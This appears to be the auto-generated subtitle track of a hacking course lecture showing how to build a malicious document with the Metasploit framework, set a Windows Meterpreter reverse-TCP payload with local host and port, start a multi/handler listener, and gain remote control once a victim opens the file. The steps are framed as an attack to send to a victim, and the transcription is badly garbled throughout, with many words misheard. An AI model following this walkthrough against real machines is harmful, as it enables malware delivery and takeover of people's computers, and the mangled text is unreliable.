1
00:00:06,470 --> 00:00:13,040
Welcome in this lecture we are going to see how to embed our malware in a normal audio file.

2
00:00:13,310 --> 00:00:17,360
As you know -- have become really common in everyday work.

3
00:00:17,750 --> 00:00:23,690
It's hard to imagine business proposals without video of the plea deal format is usually in almost all

4
00:00:23,690 --> 00:00:26,720
companies who share a business deals.

5
00:00:26,720 --> 00:00:32,230
Company brochures and even invitations previous years.

6
00:00:32,250 --> 00:00:39,260
We are not good for the beauty of rulers as they will be nobody's ever published that ad buffer overflow.

7
00:00:39,280 --> 00:00:48,040
Nobody in watching prior to watching 9 a lot of the attacks will observe trying to abuse the book by

8
00:00:48,040 --> 00:00:53,950
using social engineering or by posting malicious -- on the Internet.

9
00:00:55,150 --> 00:01:02,560
Just the simple act of opening the -- could exploit a celebrity to automatically download malicious

10
00:01:02,560 --> 00:01:09,970
code from the Internet and display L'Equipe video file to trick you into believing that nothing wrong

11
00:01:09,970 --> 00:01:10,570
has happened.

12
00:01:12,130 --> 00:01:20,400
As you can see in the chart the percentage of the attack is increasing your audience so let's see how

13
00:01:20,400 --> 00:01:25,100
the hackers embed their payload in normal video file.

14
00:01:25,120 --> 00:01:32,660
Here we are going to use my dad's plate framework to create a malicious beauty of open air terminal

15
00:01:32,830 --> 00:01:44,070
and type a massive console to start metabolite next year when to use a low underscored video underscored

16
00:01:44,210 --> 00:01:47,450
embittered underscored equally underscored.

17
00:01:47,520 --> 00:01:55,020
No javascript model to create a malicious parody of which is modified version of an operative embedded

18
00:01:55,170 --> 00:01:55,830
yikes.

19
00:01:56,060 --> 00:01:57,820
Social engineering.

20
00:01:57,890 --> 00:02:05,060
This version does not require javascript to be enabled and does not required that you seek to be a better

21
00:02:05,190 --> 00:02:11,490
deputy of the E C is embedded in the beauty of in a non-standard method.

22
00:02:11,540 --> 00:02:24,570
Using hex and coding now to use the model I use exploit slash windows slash file format slash Hello

23
00:02:25,050 --> 00:02:31,810
underscore the beauty of this code embittered and thus go easy on does score Lord jealous grip.

24
00:02:33,780 --> 00:02:40,970
Now to see the options of this module type show options.

25
00:02:41,200 --> 00:02:45,910
Here we can see the default name of our payload and video file.

26
00:02:46,840 --> 00:02:57,410
If you want to use different name to your video type set by name now enter the name which you want to

27
00:02:57,420 --> 00:03:06,580
you hear how an important next we need to set which type of payload we are going to use.

28
00:03:06,590 --> 00:03:14,630
So here we are using Windows slash with reporter slash was underscored DCP

29
00:03:17,290 --> 00:03:20,470
no enter the local IP or port.

30
00:03:20,650 --> 00:03:30,790
Listen on the machine so to get your local MP open a new terminal and a if config.

31
00:03:30,850 --> 00:03:35,890
Here is a local whose IP address copy and paste here.

32
00:03:37,530 --> 00:03:48,230
Similarly to set a port on which the connection is to listen for routine type set and port.

33
00:03:52,150 --> 00:03:55,030
Next when you create your video file

34
00:03:57,890 --> 00:04:06,180
as you can see the file is created and saved in that Amazon for No.

35
00:04:06,280 --> 00:04:14,460
To see the payload open a new terminal type duty dot Amazon for Slash.

36
00:04:14,470 --> 00:04:17,910
Local.

37
00:04:19,240 --> 00:04:31,050
Here is our malicious beauty file no to copy this file to a sleeker type CB important not a slash is

38
00:04:31,090 --> 00:04:33,330
legal.

39
00:04:33,400 --> 00:04:35,380
Let's check in with this record.

40
00:04:36,420 --> 00:04:38,030
Here is our file.

41
00:04:38,100 --> 00:04:41,660
Next we need to send this file with the machine.

42
00:04:41,660 --> 00:04:47,820
So before going to send this file to victim flesh we need to create a handler to listen it was connection

43
00:04:48,800 --> 00:05:03,920
type you explode slash multi slash handler no to payload type set reload windows slash water bottle

44
00:05:04,160 --> 00:05:13,590
slash reload and those cordless repeat similarly to set l host an import to listen on victim said l

45
00:05:13,600 --> 00:05:23,720
host one ninety two not one sixty eight but four to reload to do two notice that l port I said l bought

46
00:05:25,100 --> 00:05:36,630
80 no paper and I'd explode to start listen as you can see now we added two police on it it was conversion

47
00:05:38,380 --> 00:05:39,810
here again see as St..

48
00:05:39,810 --> 00:05:43,160
Malicious beautiful 2 with machine.

49
00:05:43,180 --> 00:05:44,800
Now let's try to open this

50
00:05:47,950 --> 00:05:53,990
you can see a lot of reload is executed automatically and we've got multiple position.

51
00:05:54,070 --> 00:05:54,940
You know what I mean.

52
00:05:56,620 --> 00:06:05,990
Now you can control European machine from here so that's how the hackers hack European machine by emitting

53
00:06:05,990 --> 00:06:10,270
the malware including of thank you.